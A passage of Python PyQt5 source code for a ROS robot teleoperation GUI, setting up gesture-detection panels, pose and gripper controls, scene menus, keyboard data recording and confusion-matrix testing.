= QLabel('Right Hand', self)\n self.lbl2.setGeometry(self.size().width()-140, 36, 100, 50)\n self.lbl3 = QLabel('Gestures', self)\n self.lbl3.setGeometry(20, TOP_MARGIN_GESTURES-30, 150, 50)\n self.lbl4 = QLabel('Gestures', self)\n self.lbl4.setGeometry(self.size().width()-140, TOP_MARGIN_GESTURES-30, 100, 50)\n\n ## View Configuration App\n settings.WindowState = 0\n self.GesturesViewState = False\n self.PlotterWindow = False\n self.MoveViewState = True\n self.OneTimeTurnOnGesturesViewStateOnLeapMotionSignIn = True\n\n ## Cursor Picking (on Configuration page)\n self.pickedSolution = np.zeros(settings.NumConfigBars)\n self.pickedTime = np.zeros(settings.NumConfigBars)\n\n self.lblConfNames = app_data_loaded['ConfigurationPage']['ItemNames']\n self.lblConfValues = ['0.', '0.', '0.', '0.', '0.', '0.', '0.', '0.']\n self.lblConfNamesObj = []\n self.lblConfValuesObj = []\n for i in range(0, settings.NumConfigBars[0]*settings.NumConfigBars[1]):\n self.lblConfNamesObj.append(QLabel(self.lblConfNames[i], self))\n self.lblConfValuesObj.append(QLabel(self.lblConfValues[i], self))\n\n ## Right panel initialization (Observations)\n self.lblRightPanelNamesObj = []\n self.lblRightPanelValuesObj = []\n for i in range(0, RightPanelMaxIterms):\n self.lblRightPanelValuesObj.append(QLabel(\"\", self))\n self.lblRightPanelNamesObj.append(QLabel(\"\", self))\n for i in self.lblRightPanelValuesObj:\n i.setVisible(False)\n\n self.comboPlayNLive = QComboBox(self)\n self.comboPlayNLive.addItem(\"Play path\")\n self.comboPlayNLive.addItem(\"Gesture based\")\n self.comboPlayNLive.activated[str].connect(self.onComboPlayNLiveChanged)\n self.comboPlayNLive.setGeometry(LEFT_MARGIN+130, TOP_MARGIN-10,ICON_SIZE*2,int(ICON_SIZE/2))\n\n self.comboPickPlayTraj = QComboBox(self)\n for path in sl.paths:\n self.comboPickPlayTraj.addItem(path.name)\n self.comboPickPlayTraj.activated[str].connect(self.onComboPickPlayTrajChanged)\n self.comboPickPlayTraj.setGeometry(LEFT_MARGIN+130+ICON_SIZE*2, TOP_MARGIN-10,ICON_SIZE*2,int(ICON_SIZE/2))\n\n self.comboLiveMode = QComboBox(self)\n self.comboLiveMode.addItem(\"Default\")\n self.comboLiveMode.addItem(\"With eef rot\")\n self.comboLiveMode.addItem(\"Separate eef rot\")\n\n self.comboLiveMode.activated[str].connect(self.onComboLiveModeChanged)\n self.comboLiveMode.setGeometry(LEFT_MARGIN+130+ICON_SIZE*2, TOP_MARGIN-10,ICON_SIZE*2,int(ICON_SIZE/2))\n ## Control of the movement execution\n self.btnPlayMove = QPushButton('Forward', self)\n self.btnPlayMove.clicked.connect(self.button_play_move)\n self.btnPlayMove.setGeometry(LEFT_MARGIN+130+ICON_SIZE*4, TOP_MARGIN-10,ICON_SIZE,int(ICON_SIZE/2))\n self.btnPlayMove2 = QPushButton('Backward', self)\n self.btnPlayMove2.clicked.connect(self.button_play_move2)\n self.btnPlayMove2.setGeometry(LEFT_MARGIN+130+ICON_SIZE*5, TOP_MARGIN-10,ICON_SIZE,int(ICON_SIZE/2))\n self.btnPlayMove3 = QPushButton('Stop', self)\n self.btnPlayMove3.clicked.connect(self.button_play_move3)\n self.btnPlayMove3.setGeometry(LEFT_MARGIN+130+ICON_SIZE*6, TOP_MARGIN-10,ICON_SIZE,int(ICON_SIZE/2))\n\n self.recording = False # Bool if recording is happening\n self.REC_TIME = recording_data_loaded['Length'] # [s]\n self.dir_queue = []\n\n self.lblStatus = QLabel('Status bar', self)\n self.lblStatus.setGeometry(LEFT_MARGIN+130, TOP_MARGIN+32, 200, 100)\n\n self.comboInteractiveSceneChanges = QComboBox(self)\n self.comboInteractiveSceneChanges.addItem(\"Scene 1 Drawer\")\n self.comboInteractiveSceneChanges.addItem(\"Scene 2 Pick/Place\")\n 
self.comboInteractiveSceneChanges.addItem(\"Scene 3 Push button\")\n self.comboInteractiveSceneChanges.addItem(\"Scene 4 - 2 Pick/Place\")\n self.comboInteractiveSceneChanges.activated[str].connect(self.onInteractiveSceneChanged)\n self.comboInteractiveSceneChanges.setGeometry(LEFT_MARGIN+130+ICON_SIZE*4, TOP_MARGIN-10,ICON_SIZE*2,int(ICON_SIZE/2))\n\n # Bottom\n self.btnRecordActivate = QPushButton('Keyboard recording', self)\n self.btnRecordActivate.clicked.connect(self.record_with_keys)\n self.btnRecordActivate.setGeometry(LEFT_MARGIN+130, TOP_MARGIN+30,ICON_SIZE*2,int(ICON_SIZE/2))\n\n self.btnPlotActivate = QPushButton('Update plot', self)\n self.btnPlotActivate.clicked.connect(self.update_plot_with_vars)\n self.btnPlotActivate.setGeometry(LEFT_MARGIN+130+int(ICON_SIZE*4), TOP_MARGIN+30,ICON_SIZE*2,int(ICON_SIZE/2))\n\n self.btnExportDataActivate = QPushButton('Export data', self)\n self.btnExportDataActivate.clicked.connect(self.export_plot_data)\n self.btnExportDataActivate.setGeometry(LEFT_MARGIN+130+int(ICON_SIZE*2), TOP_MARGIN+30,ICON_SIZE*2,int(ICON_SIZE/2))\n\n self.btnDeletePlotActivate = QPushButton('Delete data', self)\n self.btnDeletePlotActivate.clicked.connect(self.delete_plot_data)\n self.btnDeletePlotActivate.setGeometry(LEFT_MARGIN+130+int(ICON_SIZE*6), TOP_MARGIN+30,ICON_SIZE*2,int(ICON_SIZE/2))\n\n # Move Page\n lbls = ['Pos. X:', 'Pos. Y:', 'Pos. Z:', 'Ori. X:', 'Ori. Y:', 'Ori. Z:', 'Ori. W:', 'Gripper:']\n lblsVals = ['0.0', '0.0', '1.0', '0.0', '0.0', '0.0', '1.0', '0.0']\n self.movePageGoPoseLabels = []\n self.movePageGoPoseEdits = []\n for i in range(0,7):\n self.movePageGoPoseLabels.append(QLabel(self))\n self.movePageGoPoseLabels[-1].setText(lbls[i])\n self.movePageGoPoseLabels[-1].move(LEFT_MARGIN+20, TOP_MARGIN+i*32)\n self.movePageGoPoseEdits.append(QLineEdit(self))\n self.movePageGoPoseEdits[-1].move(LEFT_MARGIN+80, TOP_MARGIN+i*32)\n self.movePageGoPoseEdits[-1].resize(200, 32)\n self.movePageGoPoseEdits[-1].setText(lblsVals[i])\n self.movePageGoPoseButton = QPushButton(\"Go To Pose\", self)\n self.movePageGoPoseButton.clicked.connect(self.go_to_pose_button)\n self.movePageGoPoseButton.move(LEFT_MARGIN+80, TOP_MARGIN+7*32)\n ''' Gripper control '''\n i = 7\n self.movePageGoPoseLabels.append(QLabel(self))\n self.movePageGoPoseLabels[-1].setText(lbls[i])\n self.movePageGoPoseLabels[-1].move(LEFT_MARGIN+20, TOP_MARGIN+(i+1)*32)\n self.movePageGoPoseEdits.append(QLineEdit(self))\n self.movePageGoPoseEdits[-1].move(LEFT_MARGIN+80, TOP_MARGIN+(i+1)*32)\n self.movePageGoPoseEdits[-1].resize(200, 32)\n self.movePageGoPoseEdits[-1].setText(lblsVals[i])\n self.movePageGoGripperButton = QPushButton(\"Actuate gripper\", self)\n self.movePageGoGripperButton.clicked.connect(self.actuate_gripper_button)\n self.movePageGoGripperButton.move(LEFT_MARGIN+80, TOP_MARGIN+9*32)\n\n self.movePageOpenGripperButton = QPushButton(\"Open gripper\", self)\n self.movePageOpenGripperButton.clicked.connect(self.open_gripper_button)\n self.movePageOpenGripperButton.move(LEFT_MARGIN+80, TOP_MARGIN+10*32)\n self.movePageCloseGripperButton = QPushButton(\"Close gripper\", self)\n self.movePageCloseGripperButton.clicked.connect(self.close_gripper_button)\n self.movePageCloseGripperButton.move(LEFT_MARGIN+80+100, TOP_MARGIN+10*32)\n\n self.movePageRobotResetButton = QPushButton(\"Robot reset\", self)\n self.movePageRobotResetButton.clicked.connect(self.robot_reset_button)\n self.movePageRobotResetButton.move(LEFT_MARGIN+80, TOP_MARGIN+11*32)\n\n\n\n self.movePageUseEnvAboveButton = 
QPushButton('Above env.', self)\n self.movePageUseEnvAboveButton.clicked.connect(self.movePageUseEnvAboveButtonFun)\n self.movePageUseEnvAboveButton.setGeometry(LEFT_MARGIN+300, TOP_MARGIN+100,ICON_SIZE*2,int(ICON_SIZE/2))\n self.movePageUseEnvWallButton = QPushButton('Wall env.', self)\n self.movePageUseEnvWallButton.clicked.connect(self.movePageUseEnvWallButtonFun)\n self.movePageUseEnvWallButton.setGeometry(LEFT_MARGIN+300, TOP_MARGIN+140,ICON_SIZE*2,int(ICON_SIZE/2))\n self.movePageUseEnvTableButton = QPushButton('Table env.', self)\n self.movePageUseEnvTableButton.clicked.connect(self.movePageUseEnvTableButtonFun)\n self.movePageUseEnvTableButton.setGeometry(LEFT_MARGIN+300, TOP_MARGIN+180,ICON_SIZE*2,int(ICON_SIZE/2))\n self.movePagePoseNowButton = QPushButton('Set current pose', self)\n self.movePagePoseNowButton.clicked.connect(self.movePagePoseNowButtonFun)\n self.movePagePoseNowButton.setGeometry(LEFT_MARGIN+300, TOP_MARGIN+20,ICON_SIZE*2,int(ICON_SIZE/2))\n\n self.timer = QBasicTimer()\n self.timer.start(100, self)\n self.step = 0\n\n self.play_status = 0\n\n menubar = self.menuBar()\n viewMenu = menubar.addMenu('View')\n pageMenu = menubar.addMenu('Page')\n configMenu = menubar.addMenu('Robot config.')\n sceneMenu = menubar.addMenu('Scene')\n testingMenu = menubar.addMenu('Testing')\n leapmotionMenu = menubar.addMenu('Gestures')\n\n ## Menu items -> View options\n viewOptionsAction = QAction('View gestures data', self, checkable=True)\n viewOptionsAction.setStatusTip('View gestures data')\n viewOptionsAction.setChecked(False)\n viewOptionsAction.triggered.connect(self.toggleViewGesturesMenu)\n viewMoveOptionsAction = QAction('View move data', self, checkable=True)\n viewMoveOptionsAction.setStatusTip('View move data')\n viewMoveOptionsAction.setChecked(True)\n viewMoveOptionsAction.triggered.connect(self.toggleViewMoveMenu)\n viewPlotWindowAction = QAction('View plot window', self, checkable=True)\n viewPlotWindowAction.setStatusTip('View plot window')\n viewPlotWindowAction.setChecked(False)\n viewPlotWindowAction.triggered.connect(self.togglePlotWindow)\n\n\n ## Menu items -> Go to page\n viewGoToInfoAction = QAction('Info page', self)\n viewGoToInfoAction.setStatusTip('Info page')\n viewGoToInfoAction.triggered.connect(self.goToInfo)\n viewGoToControlAction = QAction('Control page', self)\n viewGoToControlAction.setStatusTip('Control page (beta)')\n viewGoToControlAction.triggered.connect(self.goToConfig)\n viewGoToMoveAction = QAction('Move page', self)\n viewGoToMoveAction.setStatusTip('Move page')\n viewGoToMoveAction.triggered.connect(self.goToMove)\n\n # The environment\n impMenu = QMenu('Environment', self)\n switchEnvAboveAct = QAction('Above', self)\n switchEnvAboveAct.triggered.connect(self.switchEnvAbove)\n switchEnvWallAct = QAction('Wall', self)\n switchEnvWallAct.triggered.connect(self.switchEnvWall)\n switchEnvTableAct = QAction('Table', self)\n switchEnvTableAct.triggered.connect(self.switchEnvTable)\n impMenu.addAction(switchEnvAboveAct)\n impMenu.addAction(switchEnvWallAct)\n impMenu.addAction(switchEnvTableAct)\n impMenu2 = QMenu('Orientation', self)\n fixedOriAct = QAction('Fixed (default as chosen env.)', self, checkable=True)\n fixedOriAct.triggered.connect(self.fixedOriAct)\n impMenu2.addAction(fixedOriAct)\n print_path_trace_action = QAction('Print path trace', self, checkable=True)\n print_path_trace_action.triggered.connect(self.print_path_trace)\n print_path_trace_action.checked = False\n\n record_with_keys_action = QAction('Record train data with 
keyboard keys', self, checkable=True)\n record_with_keys_action.triggered.connect(self.record_with_keys)\n download_networks_action = QAction('Download networks from gdrive', self)\n download_networks_action.triggered.connect(self.download_networks_gdrive)\n self.network_menu = QMenu('Pick detection network', self)\n self.networks = gl.gd.get_networks()\n self.network_actions = []\n for index,network in enumerate(self.networks):\n action = QAction(network, self)\n action.triggered.connect(\n lambda checked, network=network: self.changeNetwork(network))\n self.network_actions.append(action)\n self.network_menu.addAction(action)\n self.lblInfo = QLabel(\"\", self)\n self.confusion_mat_action = QAction('Test gestures', self)\n self.confusion_mat_action.setToolTip('Plus Generate Confusion matrix')\n self.confusion_mat_action.triggered.connect(self.confustion_mat)\n\n\n SCENES = sl.scenes.names()\n for index, SCENE in enumerate(SCENES):\n action = QAction('Scene '+str(index)+' '+SCENE, self)\n action.triggered.connect(\n lambda checked, index=index: self.goScene(index))\n sceneMenu.addAction(action)\n\n initTestAction = QAction('Initialization test', self)\n initTestAction.triggered.connect(self.thread_testInit)\n tableTestAction = QAction('Table test', self)\n tableTestAction.triggered.connect(self.thread_testMovements)\n inputTestAction = QAction('Test by input', self)\n inputTestAction.triggered.connect(self.thread_testMovementsInput)\n inputPlotJointsAction = QAction('Plot joints path now', self)\n inputPlotJointsAction.triggered.connect(self.thread_inputPlotJointsAction)\n inputPlotPosesAction = QAction('Plot poses path now', self)\n inputPlotPosesAction.triggered.connect(self.thread_inputPlotPosesAction)\n\n ## Add actions to the menu\n viewMenu.addAction(viewOptionsAction)\n viewMenu.addAction(viewMoveOptionsAction)\n viewMenu.addAction(viewPlotWindowAction)\n pageMenu.addAction(viewGoToInfoAction)\n pageMenu.addAction(viewGoToControlAction)\n pageMenu.addAction(viewGoToMoveAction)\n configMenu.addMenu(impMenu)\n configMenu.addMenu(impMenu2)\n configMenu.addAction(print_path_trace_action)\n testingMenu.addAction(tableTestAction)\n testingMenu.addAction(initTestAction)\n testingMenu.addAction(inputTestAction)\n testingMenu.addAction(inputPlotJointsAction)\n testingMenu.addAction(inputPlotPosesAction)\n testingMenu.addAction(self.confusion_mat_action)\n leapmotionMenu.addAction(record_with_keys_action)\n leapmotionMenu.addMenu(self.network_menu)\n leapmotionMenu.addAction(download_networks_action)\n\n thread = Thread(target = self.play_method)\n thread.start()\n\n self.setGeometry(app_data_loaded['WindowXY'][0],app_data_loaded['WindowXY'][1], app_data_loaded['WindowSize'][0], app_data_loaded['WindowSize'][1])\n self.setWindowTitle('Interface')\n self.show()\n\n ''' Initialize Visible Objects Array\n - AllVisibleObjects array specifies each object a specific view_group\n - Object visibility management across application\n '''\n self.AllVisibleObjects = []\n self.AllVisibleObjects.append(ObjectQt('lblStatus',self.lblStatus,0,view_group=['MoveViewState']))\n for n,obj in enumerate(self.lblRightPanelNamesObj):\n self.AllVisibleObjects.append(ObjectQt('lblRightPanelNamesObj'+str(n),obj,0,view_group=['GesturesViewState']))\n self.AllVisibleObjects.append(ObjectQt('lbl1',self.lbl1,0,view_group=['GesturesViewState']))\n self.AllVisibleObjects.append(ObjectQt('lbl2',self.lbl2,0,view_group=['GesturesViewState']))\n 
self.AllVisibleObjects.append(ObjectQt('lbl3',self.lbl3,0,view_group=['GesturesViewState']))\n self.AllVisibleObjects.append(ObjectQt('lbl4',self.lbl4,0,view_group=['GesturesViewState']))\n self.AllVisibleObjects.append(ObjectQt('lblInfo',self.lbl2,0,view_group=['GesturesViewState']))\n self.AllVisibleObjects.append(ObjectQt('comboPlayNLive',self.comboPlayNLive,0,view_group=['MoveViewState']))\n\n self.AllVisibleObjects.append(ObjectQt('comboPickPlayTraj',self.comboPickPlayTraj,0,view_group=['MoveViewState', 'play']))\n self.AllVisibleObjects.append(ObjectQt('btnPlayMove' ,self.btnPlayMove, 0,view_group=['MoveViewState', 'play']))\n self.AllVisibleObjects.append(ObjectQt('btnPlayMove2',self.btnPlayMove2,0,view_group=['MoveViewState', 'play']))\n self.AllVisibleObjects.append(ObjectQt('btnPlayMove3',self.btnPlayMove3,0,view_group=['MoveViewState', 'play']))\n\n self.AllVisibleObjects.append(ObjectQt('comboLiveMode',self.comboLiveMode,0,view_group=['MoveViewState', 'live']))\n self.AllVisibleObjects.append(ObjectQt('comboInteractiveSceneChanges',self.comboInteractiveSceneChanges,0,view_group=['MoveViewState', 'live']))\n\n self.AllVisibleObjects.append(ObjectQt('btnRecordActivate',self.btnRecordActivate,0,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('btnPlotActivate',self.btnPlotActivate,0,view_group=['MoveViewState', 'PlotterWindow']))\n self.AllVisibleObjects.append(ObjectQt('btnExportDataActivate',self.btnExportDataActivate,0,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('btnDeletePlotActivate',self.btnDeletePlotActivate,0,view_group=['MoveViewState', 'PlotterWindow']))\n\n for n,obj in enumerate(self.lblConfNamesObj):\n self.AllVisibleObjects.append(ObjectQt('lblConfNamesObj'+str(n),obj,1,view_group=['MoveViewState']))\n for n,obj in enumerate(self.lblConfValuesObj):\n self.AllVisibleObjects.append(ObjectQt('lblConfValuesObj'+str(n),obj,1,view_group=['MoveViewState']))\n for n,obj in enumerate(self.movePageGoPoseLabels):\n self.AllVisibleObjects.append(ObjectQt('movePageGoPoseLabels'+str(n),obj,2,view_group=['MoveViewState']))\n for n,obj in enumerate(self.movePageGoPoseEdits):\n self.AllVisibleObjects.append(ObjectQt('movePageGoPoseEdits'+str(n),obj,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageGoPoseButton',self.movePageGoPoseButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageGoGripperButton',self.movePageGoGripperButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageOpenGripperButton',self.movePageOpenGripperButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageCloseGripperButton',self.movePageCloseGripperButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageRobotResetButton',self.movePageRobotResetButton,2,view_group=['MoveViewState']))\n\n self.AllVisibleObjects.append(ObjectQt('movePageUseEnvAboveButton',self.movePageUseEnvAboveButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageUseEnvWallButton',self.movePageUseEnvWallButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageUseEnvTableButton',self.movePageUseEnvTableButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePagePoseNowButton',self.movePagePoseNowButton,2,view_group=['MoveViewState']))\n\n self.setMouseTracking(True)\n self.mousex, self.mousey = 0.,0.\n 
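# initialize the right panel with the hand-confidence entries ('r conf.', 'l conf.')\n 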
self.updateLeftRightPanel(rightPanelNames=['r conf.', 'l conf.'])\n print(\"[Interface] Done\")\n\n self.plot_window = None\n\n # Various\n self.paint_sequence = 0\n\n def togglePlotWindow(self, state):\n if state:\n self.PlotterWindow = True\n self.plot_window = AnotherWindowPlot()\n self.plot_window.show()\n self.plot_window.set_n_series(gl.gd.l.dynamic.info.n)\n else:\n self.PlotterWindow = False\n self.plot_window = None\n\n def updateLeftRightPanel(self, leftPanelNames=None, rightPanelNames=None):\n ''' Update the names on the left or right panel\n '''\n if rightPanelNames:\n for i in range(len(rightPanelNames)):\n obj = self.lblRightPanelNamesObj[i]\n obj.setText(rightPanelNames[i])\n if leftPanelNames:\n for i in range(len(leftPanelNames)):\n obj = self.lblLeftPanelNamesObj[i]\n obj.setText(leftPanelNames[i])\n\n def getRightPanelValues(self):\n ''' Get the values for the right panel\n '''\n values = []\n values.append(round(ml.md.frames[-1].r.confidence,2))\n values.append(round(ml.md.frames[-1].l.confidence,2))\n return values\n\n def getRightPanelActivates(self):\n activates = []\n activates.append(ml.md.frames[-1].r.confidence > settings.yaml_config_gestures['min_confidence'])\n activates.append(ml.md.frames[-1].l.confidence > settings.yaml_config_gestures['min_confidence'])\n return activates\n\n def mouseMoveEvent(self, event):\n self.mousex, self.mousey = event.x(), event.y()\n\n def go_to_pose_button(self):\n ''' Takes the text inputs given by the user and changes the robot goal_pose\n '''\n vals = []\n for obj in self.movePageGoPoseEdits[0:7]:\n val = None\n try:\n val = float(obj.text())\n except:\n print(\"[ERROR*] Value Error!\")\n val = 0.0\n vals.append(val)\n pose = Pose()\n pose.position = Point(*vals[0:3])\n pose.orientation = Quaternion(*vals[3:7])\n ml.md.goal_pose = pose\n ml.md.m.go_to_pose(pose)\n\n def actuate_gripper_button(self):\n ''' Takes a float text input and controls the gripper position\n '''\n val = None\n try:\n val = float(self.movePageGoPoseEdits[7].text())\n except:\n print(\"[ERROR*] Value Error!\")\n val = 0.0\n ml.md.m.set_gripper(val, effort=0.04, eef_rot=-1, action=\"\", object=\"\")\n\n def open_gripper_button(self):\n ml.md.m.set_gripper(1.0, action=\"release\")\n\n def close_gripper_button(self):\n ml.md.m.set_gripper(0.0)\n\n def robot_reset_button(self):\n '''pose = Pose()\n pose.orientation.x = np.sqrt(2)/2\n pose.orientation.y = np.sqrt(2)/2\n pose.position.x = 0.5\n pose.position.z = 0.2\n ml.md.m.go_to_pose(pose)'''\n ml.md.m.reset()\n\n def keyPressEvent(self, event):\n ''' Callback for every keyboard button press\n '''\n if settings.record_with_keys:\n KEYS = [self.mapQtKey(key) for key in gl.gd.GsExt_keys]\n if event.key() in KEYS:\n self.recording = True\n for n, key in enumerate(KEYS):\n if event.key() == key:\n self.dir_queue.append(gl.gd.GsExt[n])\n self.caller = RepeatableTimer(self.REC_TIME, self.save_data, ())\n self.caller.start()\n else:\n print(\"[Interface] Key has been read, but recording is not activated!\")\n event.accept()\n\n\n def changeNetwork(self, network, type='static'):\n ''' Sends a ROS service request to change the detection network\n '''\n\n rospy.wait_for_service(f'/teleop_gesture_toolbox/change_{type}_network')\n try:\n change_network = rospy.ServiceProxy(f'/teleop_gesture_toolbox/change_{type}_network', ChangeNetwork)\n response = change_network(data=network)\n Gs = [g.lower() for g in response.Gs]\n settings.args = response.args\n print(\"[UI] Gestures & Network changed, new set of gestures: \"+str(\", \".join(Gs)))\n except rospy.ServiceException as e:\n print(\"Service call failed: %s\"%e)\n settings.paths.gesture_network_file = network\n\n gl.gd.gesture_change_srv(local_data=response)
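\n\n # Illustrative usage (hypothetical call, mirroring the service name built above):\n # self.changeNetwork('some_network', type='static') requests the\n # /teleop_gesture_toolbox/change_static_network service and prints the new gesture set.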
\n\n def download_networks_gdrive(self):\n ''' Downloads all networks from Google Drive\n 1. Files download\n 2. Network info update\n '''\n gl.gd.download_networks_gdrive()\n # Update Networks Menu\n self.network_menu.clear()\n self.networks = gl.gd.get_networks()\n self.network_actions = []\n for network in self.networks:\n action = QAction(network, self)\n action.triggered.connect(\n lambda checked, network=network: self.changeNetwork(network))\n self.network_menu.addAction(action)\n self.network_actions.append(action)\n\n time.sleep(1)\n\n def confustion_mat(self, e):\n thread = Thread(target = self.confustion_mat_)\n thread.start()\n def button_play_move(self, e):\n self.play_status = 1\n def button_play_move2(self, e):\n self.play_status = -1\n def button_play_move3(self, e):\n self.play_status = 0\n\n def save_data(self):\n ''' Saving record data in this thread will be deprecated; a ROS service will be created instead\n '''\n rospy.wait_for_service('save_hand_record')\n try:\n save_hand_record = rospy.ServiceProxy('save_hand_record', SaveHandRecord)\n resp1 = save_hand_record(directory=settings.paths.learn_path+self.dir_queue.pop(0), save_method='numpy', recording_length=1.0)\n except rospy.ServiceException as e:\n print(\"Service call failed: %s\"%e)\n self.recording = False\n\n def play_method(self):\n while True:\n time.sleep(0.1)\n ml.md.HoldValue += self.play_status\n if self.play_status == 1 and ml.md.HoldValue > 100:\n ml.md.HoldValue = 99\n self.play_status = 0\n if self.play_status == -1 and ml.md.HoldValue < 0:\n ml.md.HoldValue = 1\n self.play_status = 0\n\n\n def confustion_mat_(self):\n self.lblInfo.setText(\"Show gesture disp. 
here\")\n time.sleep(5)\n NUM_SAMPLES = 5\n DELAY_BETW_SAMPLES = 0.5\n y_true = []\n y_pred = []\n\n gl.gd.r.static.names\n static_gestures_list = gl.gd.r.static.names()\n for n, i in enumerate(static_gestures_list):\n for j in range(0,NUM_SAMPLES):\n self.lblInfo.setText(i+\" \"+str(j))\n time.sleep(DELAY_BETW_SAMPLES)\n for m,g in enumerate(static_gestures_list):\n if gl.gd.r.poses[m].toggle:\n y_true.append(n)\n y_pred.append(m)\n\n self.lblInfo.setText(\"Done (Saved as confusionmatrix.csv)\")\n cm = confusion_matrix(y_true, y_pred)\n cm_ = np.vstack((static_gestures_list,cm))\n static_gestures_list.insert(0,\"Confusion matrix\")\n cm__ = np.hstack((np.array([static_gestures_list]).transpose(),cm_))\n with open('confusionmatrix.csv', 'w') as file:\n writer = csv.writer(file)\n writer.writerows(cm__)\n\n\n\n def toggleViewGesturesMenu(self, state):\n self.GesturesViewState = state\n def toggleViewMoveMenu(self, state):\n self.MoveViewState = state\n def goToInfo(self):\n settings.WindowState = 0\n def goToConfig(self):\n settings.WindowState = 1\n def goToMove(self):\n settings.WindowState = 2\n\n def gestures_goal_init_procedure(self):\n ml.md.gestures_goal_pose.position = ml.md.ENV['start']\n ml.md.gestures_goal_pose.orientation = ml.md.ENV['ori']\n ml.md.goal_pose.position = ml.md.ENV['start']\n ml.md.goal_pose.orientation = ml.md.ENV['ori']\n\n # Switch the environment functions\n def switchEnvAbove(self):\n ml.md.ENV = ml.md.ENV_DAT['above']\n self.gestures_goal_init_procedure()\n def switchEnvWall(self):\n ml.md.ENV = ml.md.ENV_DAT['wall']\n self.gestures_goal_init_procedure()\n def switchEnvTable(self):\n ml.md.ENV = ml.md.ENV_DAT['table']\n self.gestures_goal_init_procedure()\n\n def movePageUseEnvAboveButtonFun(self):\n self.movePageGoPoseEdits[3].setText(str(ml.md.ENV_DAT['above']['ori'].x))\n self.movePageGoPoseEdits[4].setText(str(ml.md.ENV_DAT['above']['ori'].y))\n self.movePageGoPoseEdits[5].setText(str(ml.md.ENV_DAT['above']['ori'].z))\n self.movePageGoPoseEdits[6].setText(str(ml.md.ENV_DAT['above']['ori'].w))\n def movePageUseEnvWallButtonFun(self):\n self.movePageGoPoseEdits[3].setText(str(ml.md.ENV_DAT['wall']['ori'].x))\n self.movePageGoPoseEdits[4].setText(str(ml.md.ENV_DAT['wall']['ori'].y))\n self.movePageGoPoseEdits[5].setText(str(ml.md.ENV_DAT['wall']['ori'].z))\n self.movePageGoPoseEdits[6].setText(str(ml.md.ENV_DAT['wall']['ori'].w))\n def movePageUseEnvTableButtonFun(self):\n self.movePageGoPoseEdits[3].setText(str(ml.md.ENV_DAT['table']['ori'].x))\n self.movePageGoPoseEdits[4].setText(str(ml.md.ENV_DAT['table']['ori'].y))\n self.movePageGoPoseEdits[5].setText(str(ml.md.ENV_DAT['table']['ori'].z))\n self.movePageGoPoseEdits[6].setText(str(ml.md.ENV_DAT['table']['ori'].w))\n def movePagePoseNowButtonFun(self):\n self.movePageGoPoseEdits[0].setText(str(ml.md.goal_pose.position.x))\n self.movePageGoPoseEdits[1].setText(str(ml.md.goal_pose.position.y))\n self.movePageGoPoseEdits[2].setText(str(ml.md.goal_pose.position.z))\n\n self.movePageGoPoseEdits[3].setText(str(ml.md.goal_pose.orientation.x))\n self.movePageGoPoseEdits[4].setText(str(ml.md.goal_pose.orientation.y))\n self.movePageGoPoseEdits[5].setText(str(ml.md.goal_pose.orientation.z))\n self.movePageGoPoseEdits[6].setText(str(ml.md.goal_pose.orientation.w))\n\n # Fixed orientation function\n def fixedOriAct(self, state):\n settings.ORIENTATION_MODE = 'fixed' if state else 'free'\n def print_path_trace(self, state):\n settings.print_path_trace = state\n def record_with_keys(self, state):\n if not state: state 
= True\n settings.record_with_keys = state\n\n def update_plot_with_vars(self):\n self.plot_window.update_plot()\n\n def export_plot_data(self):\n gl.gd.export()\n print(\"[UI] Plot data exported!\")\n\n def delete_plot_data(self):\n ml.md.frames.clear()\n gl.gd.l.dynamic.data_queue.clear()\n gl.gd.r.dynamic.data_queue.clear()\n gl.gd.l.static.data_queue.clear()\n gl.gd.r.static.data_queue.clear()\n self.plot_window.canvas.axes2.cla()\n print(\"[UI] All data deleted!\")\n\n def goScene(self, index):\n scenes = sl.scenes.names()\n sl.scenes.make_scene(ml.md.m, scenes[index])\n\n def onComboPlayNLiveChanged(self, text):\n if text==\"Live hand\":\n ml.md.mode = 'live'\n elif text==\"Play path\":\n ml.md.mode = 'play'\n elif text==\"Gesture based\":\n ml.md.mode = 'gesture'\n def onComboPickPlayTrajChanged(self, text):\n ml.md.changePlayPath(text)\n def onComboLiveModeChanged(self, text):\n ml.md.changeLiveMode(text)\n def onInteractiveSceneChanged(self, text):\n if text == \"Scene 1 Drawer\":\n sl.scenes.make_scene(ml.md.m, 'drawer')\n ml.md.ENV = ml.md.ENV_DAT['wall']\n elif text == \"Scene 2 Pick/Place\":\n sl.scenes.make_scene('pickplace')\n ml.md.ENV = ml.md.ENV_DAT['table']\n elif text == \"Scene 3 Push button\":\n sl.scenes.make_scene('pushbutton')\n ml.md.ENV = ml.md.ENV_DAT['table']\n elif text == \"Scene 4 - 2 Pick/Place\":\n sl.scenes.make_scene('pickplace2')\n ml.md.ENV = ml.md.ENV_DAT['table']\n else: raise Exception(\"Item not on a list!\")\n self.gestures_goal_init_procedure()\n\n def paintEvent(self, e):\n ## Window Resolution update\n self.w = settings.w = self.size().width()\n self.h = settings.h = self.size().height()\n\n '''\n if self.paint_sequence % 50 == 0:\n self.update_plot_with_vars()\n self.paint_sequence += 1\n '''\n ## Set all objects on page visible (the rest set invisible)\n for obj in self.AllVisibleObjects:\n # Every object that belongs to that group are conditioned by that group\n if obj.page == settings.WindowState and \\\n (self.GesturesViewState if 'GesturesViewState' in obj.view_group else True) and \\\n (self.MoveViewState if 'MoveViewState' in obj.view_group else True) and \\\n (self.PlotterWindow if 'PlotterWindow' in obj.view_group else True) and \\\n ((ml.md.mode=='live') if 'live' in obj.view_group else True) and \\\n ((ml.md.mode=='play') if 'play' in obj.view_group else True) and \\\n ((ml.md.mode=='gesture') if 'gesture' in obj.view_group else True):\n obj.qt.setVisible(True)\n else:\n obj.qt.setVisible(False)\n\n ## Point given window\n if settings.WindowState == 0:\n self.mainPage(e)\n if settings.WindowState == 1:\n self.configPage(e)\n if settings.WindowState == 